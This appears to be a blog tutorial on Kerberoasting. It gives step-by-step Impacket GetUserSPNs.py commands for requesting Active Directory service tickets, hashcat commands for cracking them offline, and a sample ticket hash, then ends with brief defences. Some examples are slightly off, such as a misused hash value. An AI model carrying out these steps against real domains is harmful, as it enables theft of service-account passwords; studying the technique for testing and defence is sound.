
What is Kerberoasting?
Kerberoasting is an attack where an adversary requests service tickets for Service Principal Names (SPNs) from a Domain Controller, extracts these tickets, and attempts to crack their associated passwords offline.
Pre-requisites
Before running a Kerberoasting attack using Impacket, ensure the following:
- You have a valid domain user account (low-privilege).
- Impacket is installed on your system.
Install Impacket:
You can install Impacket using pip
:
pip install impacket
Or clone the repository:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
Kerberoasting Using Impacket
Impacket provides several tools, including GetUserSPNs.py
, which can be used for Kerberoasting attacks.
Basic Command:
python3 GetUserSPNs.py <domain>/<username>:<password> -request
- : The Active Directory domain (e.g.,
contoso.local
). - : The domain user’s username.
- : The password for the domain user.
This will request service tickets (TGS) for accounts with SPNs and output the extracted Kerberos tickets in a hash format that can be cracked.
Command Breakdown
Retrieve SPNs with TGS Tickets:
python3 GetUserSPNs.py <domain>/<username>:<password> -request
- This command will query for user accounts with associated SPNs and request a service ticket (TGS) for each.
- The TGS tickets are displayed in a format suitable for cracking (e.g., using hashcat).
Example Usage:
python3 GetUserSPNs.py contoso.local/ryan:Password123 -dc-ip 10.0.0.1 -request
- -dc-ip: Optional argument to specify the IP of the Domain Controller (if needed).
Specifying Hash Instead of Password:
If you have the NTLM hash of the domain user instead of their password, you can use it like so:
python3 GetUserSPNs.py <domain>/<username> -hashes <LMHASH>:<NTHASH> -request
- :: The LM and NT hashes of the user’s password (e.g.,
aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
).
Example (with hash):
python3 GetUserSPNs.py contoso.local/ryan -hashes :aad3b435b51404eeaad3b435b51404ee -request
Saving Output to a File
You can redirect the output to a file for later use with a cracking tool like hashcat:
python3 GetUserSPNs.py <domain>/<username>:<password> -request > kerberoast_hashes.txt
Cracking Kerberos Tickets with Hashcat
Once you’ve obtained the service ticket hashes, the next step is to crack them offline using a tool like hashcat.
Example Command with Hashcat:
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt
- -m 13100: This specifies the hash type for Kerberos 5 TGS-REP (the format used in Kerberoasting).
- kerberoast_hashes.txt: The file containing the TGS hashes extracted from the Impacket Kerberoasting.
- /path/to/wordlist.txt: The wordlist to use for password cracking.
Example Output from Impacket:
$krb5tgs$23$*sqlservice$CONTOSO.LOCAL$contoso.local/sqlservice:88$0c593bb6db76f8a4bf39c7da99173b50$3be75864f120763769f571b13b0379e7bb3c49fa0ef0d6f3f7d4fcf300f519364a5aa23038096adfbecdb929c42124f37f0834656883a7cd02f26ac5c8b243c7bc72b58904c3467d9f640da799c026a6
This can be fed directly into hashcat to begin password cracking.
Advanced Options
Specify Kerberos Realm:
If you’re working in a multi-domain environment or need to specify a particular realm:
python3 GetUserSPNs.py <domain>/<username>:<password> -request -k -no-pass -target-domain <target-domain>
- -target-domain: Specify the target domain for the attack.
- -k: Use Kerberos authentication instead of NTLM.
- -no-pass: Run the query without supplying a password.
Using Kerberos Tickets (.kirbi files):
If you already have a Kerberos ticket-granting ticket (TGT), you can use it to request service tickets (TGS):
python3 GetUserSPNs.py -k -no-pass -target-domain <target-domain> -request
This command allows the attacker to continue their Kerberoasting attempts using a valid Kerberos TGT.
Defensive Measures
To protect against Kerberoasting, organizations can:
- Enforce strong, complex passwords for service accounts.
- Limit which accounts are allowed to have SPNs.
- Regularly rotate service account passwords.
- Monitor and restrict the number of TGS requests for service accounts.
Leave a Reply